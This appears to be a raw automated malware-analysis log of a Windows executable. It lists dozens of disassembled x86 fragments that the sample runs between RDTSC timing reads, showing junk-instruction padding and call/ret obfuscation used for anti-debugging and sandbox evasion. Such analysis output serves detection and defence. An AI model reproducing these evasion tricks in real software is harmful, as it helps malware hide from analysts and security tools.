                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E721EB second address: E721FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FCA18C4F696h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E7237E second address: E7239B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCA18DB50EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FCA18DB50E6h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E7239B second address: E7239F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E7239F second address: E723A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E724CA second address: E724D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18C4F69Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E724D8 second address: E724F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E724F8 second address: E724FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E724FE second address: E72514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCA18DB50EDh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E75213 second address: E7521D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E7521D second address: E75223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E75223 second address: E75227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E796F0 second address: E796F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E796F4 second address: E79709 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCA18C4F696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FCA18C4F69Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E79709 second address: E79710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E79895 second address: E7989C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E7989C second address: E798A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E79E6E second address: E79E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 jmp 00007FCA18C4F6A1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCA18C4F6A3h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E79E9E second address: E79EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FCA18DB50E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E7A187 second address: E7A1C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jng 00007FCA18C4F6A7h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FCA18C4F696h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E7A1C0 second address: E7A1C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E7A317 second address: E7A322 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007FCA18C4F696h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E82919 second address: E8291D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8291D second address: E82937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCA18C4F6A4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E82937 second address: E8293C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E82ACA second address: E82ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E82ACE second address: E82AD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E82424 second address: E82445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E82445 second address: E8246A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FCA18DB50FBh 0x00000010 jmp 00007FCA18DB50EFh 0x00000015 ja 00007FCA18DB50E6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8246A second address: E8249C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCA18C4F6A2h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FCA18C4F6A9h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E831EC second address: E831FC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCA18DB50E6h 0x00000008 jnp 00007FCA18DB50E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E831FC second address: E83213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FCA18C4F696h 0x00000009 je 00007FCA18C4F696h 0x0000000f jg 00007FCA18C4F696h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E83213 second address: E8321C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E834D8 second address: E834E2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA18C4F6A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E834E2 second address: E834E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4424C second address: E44250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E44250 second address: E44254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E44796 second address: E4479A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4479A second address: E4479E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4479E second address: E447C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007FCA18C4F6B5h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCA18C4F6A3h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E44D6A second address: E44DE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FCA18DB50E8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D3810h], esi 0x0000002d mov ch, 65h 0x0000002f push 0000001Eh 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007FCA18DB50E8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b jc 00007FCA18DB50ECh 0x00000051 and edx, 296EE0DAh 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d pop edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E45076 second address: E4509E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCA18C4F696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FCA18C4F6A2h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4509E second address: E450A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E450A3 second address: E450A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E450A9 second address: E450AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4511D second address: E45122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E45122 second address: E4512C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FCA18DB50E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4512C second address: E451A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F69Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jg 00007FCA18C4F696h 0x00000014 jmp 00007FCA18C4F6A1h 0x00000019 popad 0x0000001a push ecx 0x0000001b jmp 00007FCA18C4F6A2h 0x00000020 pop ecx 0x00000021 popad 0x00000022 nop 0x00000023 mov dword ptr [ebp+122D1F3Ah], ecx 0x00000029 lea eax, dword ptr [ebp+1247EBE4h] 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007FCA18C4F698h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000015h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 xor dword ptr [ebp+122D1DCCh], eax 0x0000004f nop 0x00000050 push ecx 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E451A5 second address: E4522C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FCA18DB50F4h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FCA18DB50E8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1D81h], ecx 0x00000035 lea eax, dword ptr [ebp+1247EBA0h] 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007FCA18DB50E8h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 mov edi, dword ptr [ebp+122D3B22h] 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e je 00007FCA18DB50E8h 0x00000064 push edi 0x00000065 pop edi 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4522C second address: E45241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCA18C4F6A0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E87196 second address: E871B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50F9h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E876FC second address: E87700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E87700 second address: E8770C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA18DB50E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8770C second address: E87724 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FCA18C4F69Bh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8789F second address: E878A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8E59D second address: E8E5B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F69Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8E861 second address: E8E891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCA18DB50F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e ja 00007FCA18DB50E6h 0x00000014 pop esi 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8E891 second address: E8E8AB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCA18C4F696h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCA18C4F69Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8E8AB second address: E8E8AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8EA17 second address: E8EA2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8EA2C second address: E8EA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8EA32 second address: E8EA37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8EA37 second address: E8EA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCA18DB50E6h 0x0000000a popad 0x0000000b js 00007FCA18DB50E8h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007FCA18DB50EDh 0x0000001d pushad 0x0000001e popad 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 popad 0x00000022 pushad 0x00000023 push esi 0x00000024 pop esi 0x00000025 push esi 0x00000026 pop esi 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E95465 second address: E95481 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A4h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9408A second address: E940A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E940A2 second address: E940BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FCA18C4F6A1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E940BE second address: E940C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9420E second address: E94213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E94213 second address: E94219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E94219 second address: E9422C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18C4F69Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E944CB second address: E944F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FCA18DB5104h 0x0000000d jmp 00007FCA18DB50F8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E944F2 second address: E944FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCA18C4F698h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E944FE second address: E9450C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jg 00007FCA18DB50ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E44B73 second address: E44B79 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E44B79 second address: E44B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E44B7F second address: E44B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E44B83 second address: E44BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f mov dl, 9Bh 0x00000011 mov edi, dword ptr [ebp+122D1D5Eh] 0x00000017 popad 0x00000018 mov ebx, dword ptr [ebp+1247EBDFh] 0x0000001e mov edx, dword ptr [ebp+122D39E6h] 0x00000024 jmp 00007FCA18DB50EDh 0x00000029 add eax, ebx 0x0000002b mov cx, di 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FCA18DB50F5h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E44BDF second address: E44C00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E94640 second address: E94644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E94644 second address: E9464A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9516D second address: E95175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9895A second address: E9897D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FCA18C4F696h 0x0000000a jmp 00007FCA18C4F6A9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9897D second address: E98988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E98C62 second address: E98C6E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCA18C4F696h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E98C6E second address: E98C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9C39D second address: E9C3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18C4F6A2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9C3B3 second address: E9C3B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9C3B7 second address: E9C3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCA18C4F6A0h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
